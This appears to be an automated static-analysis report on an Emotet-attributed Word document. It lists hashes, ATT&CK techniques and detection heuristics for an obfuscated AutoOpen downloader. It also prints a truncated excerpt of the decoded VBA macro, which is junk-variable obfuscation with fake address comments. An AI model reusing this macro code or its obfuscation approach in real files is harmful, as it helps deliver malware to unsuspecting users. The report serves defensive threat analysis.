Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 7a8a800c29c6e9db…

MALICIOUS

Office (OLE)

Size: 275.5 KB
Created: 2019-10-10 18:29:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: dd244e178c2baf9389c3db10c9165f46
SHA-1: 2d824c3960863612420dde458ac80b63f48872ce
SHA-256: 7a8a800c29c6e9dbf732d98fd5eccb9e78078101fee30d287dc534e83e58a22d
Risk score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The file contains heavily obfuscated VBA macros, including an AutoOpen function, and triggers heuristics for an obfuscated auto-exec loader and for CreateObject calls. ClamAV identifies it as 'Doc.Downloader.Emotet-7297196-0', strongly suggesting the Emotet family. The VBA code's primary function appears to be downloading and executing a secondary payload, a common Emotet tactic.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7297196-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7297196-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 4 related findings)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 72842 bytes
SHA-256: 318b79d8fab34cfe20777868fe182321b112c59728cafa7037c629623f7cf43f

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "b06411x371x13"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b660600x596, 0, 0, MSForms, TextBox"
Attribute VB_Control = "c78bc00741c, 1, 1, MSForms, TextBox"
Attribute VB_Control = "b01x002007c5, 2, 2, MSForms, TextBox"
Attribute VB_Control = "bc207bc05xb, 3, 3, MSForms, TextBox"
Attribute VB_Control = "b00b79b5219c9, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c050c04c970, 5, 5, MSForms, TextBox"

Attribute VB_Name = "b19bc018308"
Function x089000cx63()
On Error Resume Next
   b086b036433 = False
'Future84487 Morton Plains, Devynchester, Montenegro Dynamic89206 Gibson Wells, Sporerton, Saint Kitts and Nevis
b608c91x29605 = Rnd(bc90304b6cx1)
x009b80x010xx = True
'District243 Cruickshank Row, Konopelskiside, Bangladesh Lead5008 Onie Village, Streichview, Burkina Faso
x780802759b = Rnd(x5c5b2b08133)
x5x30c057345 = False
'Senior74365 Wisoky Lake, Ryleybury, Guyana Chief374 Myrtle Viaduct, Port Katlynnmouth, Greenland
x5x05203b509b = Rnd(b24020c543x7)
cx8417cc40700 = False
'Central321 Medhurst Extensions, South Gage, Montenegro Global6190 Arvid Creek, Pfefferville, Puerto Rico
bxx7bcb0870b = Rnd(b49b53422091)
b15x0003x0899 = False
'Product084 Ruth Ville, Peterburgh, Comoros Principal389 Lera Islands, Schowalterfort, Isle of Man
c26c605095xcb = Rnd(c00c55c03c8)
c4983257cb8c = True
'Direct3406 Ashly Canyon, South Lonie, Iraq Global96417 King Stravenue, West Samarahaven, Guatemala
c799080b0067 = Rnd(bcx06bb294001)
c2x4b31749868 = False
'Forward34678 Rosalinda Underpass, Shayneton, Kyrgyz Republic Human939 Dicki Prairie, South Maxie, Indonesia
x900cxb970260 = Rnd(x433b55143167)
b4892bx449874 = False
'National841 Miller Rue, New Lawrenceburgh, Switzerland Product681 Olaf Land, North Martine, Papua New Guinea
c326811256763 = False
'Forward91603 Hudson Falls, East Dantetown, Panama Forward60262 Schmitt Ranch, Kertzmannmouth, Guatemala
b579400cx0x00 = Rnd(cx07601b683b)
c69051c09x0 = False
'Central21337 Sadie Valley, Margretstad, Bosnia and Herzegovina Investor7781 Germaine Ways, Doylefurt, Philippines
x98118x8700 = Rnd(x4bxb080323)
b20308780405 = False
'Chief2111 Orn Trace, Lemkeville, Sudan Global00123 Kovacek Dam, New Bethel, Canada
x6b00b3x0080 = Rnd(x042191901x)
b2017046516 = True
'Human107 Kris Lodge, Lake Susannaport, Zimbabwe District809 White Forks, Joyfurt, Suriname
x450807240071 = Rnd(b909000909b)
c9900360107c6 = False
'Lead9220 Carrie Club, Raynorbury, Guam Chief078 Fritsch Neck, Kielmouth, Swaziland
xx836cc0407 = Rnd(b91700782x9)
bc02620050b94 = True
'Product61627 Beatty Street, Rebamouth, Philippines Corporate979 Kenyon Union, Goldnerton, Saint Martin
c3c211168028 = Rnd(c0058000b132)
cb053090048 = False
'Future641 Jenkins Ford, Port Shannamouth, Chile Product35464 Horacio Walks, Port Guiseppeton, Benin
b12173550c1 = Rnd(bb10000x86b03)
xx60x8380090 = True
'Principal291 Waters Centers, Tianaberg, Western Sahara Product66781 Rice Plaza, New Carolyn, Guatemala
   c9x4110bc00b0 = True
'Future01192 Gerhard Course, Port Eldredtown, Svalbard & Jan Mayen Islands Senior3274 Mack Grove, East Trystan, Nepal
cb00c033c7005 = Rnd(c7640400064)
cc700700802x = False
'Central268 Rolfson Valleys, Eberthaven, Australia Human9020 Hintz Shores, New Theresehaven, Belarus
c0416xxb4646 = Rnd(x04929400xx02)
c241x0c6206 = True
'Central493 Dickens Mount, South Billymouth, Guinea Product736 Funk Meadows, South Verlamouth, Djibouti
cx34x08046000 = Rnd(bc809082x26xx)
c0c6c087038 = True
'Corporate29236 Blanda Ferry, Itzelport, Botswana International3096 Mckenzie Ville, West Bartholome, Estonia
c73x03cc1000 = Rnd(xc50762809500)
c4x726405x9c = False
'Investor48703 Doyle Squares, West Johnathonstad, Burkina Faso International75828 Viola Flat, Gerholdville, Qatar
x28x23536b0b = Rnd(b7154734020c)
x0032x04007 = True
'In
... (truncated)